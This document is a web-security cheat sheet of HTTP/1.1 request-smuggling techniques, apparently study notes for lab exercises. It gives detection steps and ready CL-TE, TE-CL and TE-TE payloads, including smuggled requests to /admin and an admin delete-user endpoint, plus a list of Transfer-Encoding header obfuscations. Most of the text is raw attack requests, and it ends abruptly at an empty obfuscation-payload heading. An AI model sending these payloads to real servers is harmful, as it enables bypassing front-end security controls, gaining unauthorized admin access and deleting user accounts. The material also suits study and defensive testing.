What is Request Smuggling HTTP/1.1
A vulnerability where attackers exploit discrepancies in how HTTP/1.1 requests are parsed by different servers (e.g., a proxy and a backend). By manipulating headers like Transfer-Encoding and Content-Length, an attacker can craft requests that are interpreted differently by each server, potentially bypassing security filters, causing unauthorized access, or smuggling malicious requests to be processed by the backend.
Methodology
# IMPORTANT SETTING
- Remove update content length
- Set request as HTTP/1.1 (Setting & Request)
- Enalbe visualisation of the \r \n characters
Important to understand that (\r & \n) count as characters during process
---------------------------------------------------------------------------------
# Identify the Front-End Server header
Content-Length (CL) or Transfer-Encoding (TE)
Invalid Request
----------------------------------------------------------------------------------
# Identify the Back-End Server header
Content-Length (CL) or Transfer-Encoding (TE)- Use different payload to see if this can change something (Ex: whitespace, Double TE Headers, Multi-line header, Null bytes, ... )
Payloads
# CL-TE
GOAL: Sending Normal Request using Content Length, using Transfer encoding (Backend) to include a second request after "0".
## Frontend
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
3
abc
x ---> Frontend will use the first 6 chracters and x will be drop, backend will error because there is no 0 (say it end)
=~=~=~=~=~=~=~=~=~=~=~=~
## Payload 1
POST / HTTP/1.1
Host: example.com
Content-Length: 116
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
x= ---> Append the other request in dummy parameter
=~=~=~=~=~=~=~=~=~=~=~=~
## Payload 2
POST / HTTP/1.1
Host: example.com
Content-Length: 40
Transfer-Encoding: chunked
0
GET /hijuhgtf HTTP/1.1
x-Ignore: x ---> Append the other request in dummy header
=~=~=~=~=~=~=~=~=~=~=~=~
## Payload 3 (If applied to a search query, it might reveal the server's headers.)
Content-Length: 178
Transfer-Encoding: chunked
0
POST /admin/delete?username=carlos HTTP/1.1
X-VqDWQP-Ip: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
search=sdfcds (HEADER WILL FOLLOW)
- Content Length of 6 include 0 and the "G" from the frontend server to be sent to the backend (Backend will not take "G" since the chunked size is 0)
----------------------------------------------------------------------------------
# TE-CL (USING HEX VALUE, Not Length)
GOAL: Sending a normal request using Transfer Econding, using Content Lengt (Backend) to cut the request in 2 request.
## Frontend
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
3
abc
x ---> X is an invalid chunk size (Request Error)
## Backend
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
0
x ---> X will be dropped, if error = using CL, if ok = TE
=~=~=~=~=~=~=~=~=~=~=~=~
## Payload 1
POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
x=1
0
--> Other Return Line
- 0 is stick to the body
- Content Length of 4 include 5c and the /r/n
- 5c calculated from "GPOST, ... x=1 (before return line)"
----------------------------------------------------------------------------------
# TE-TE (obfuscating the TE header)
Transfer-encoding: abc
Transfer-Encoding: abc
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding : chunked
## Frontend
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
3
abc
x ---> X is an invalid chunk size (Request Error)
## Backend
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked
0
x ---> X will be dropped, if error = using CL, if ok = TE
=~=~=~=~=~=~=~=~=~=~=~=~
## Payload (Using Obfuscation)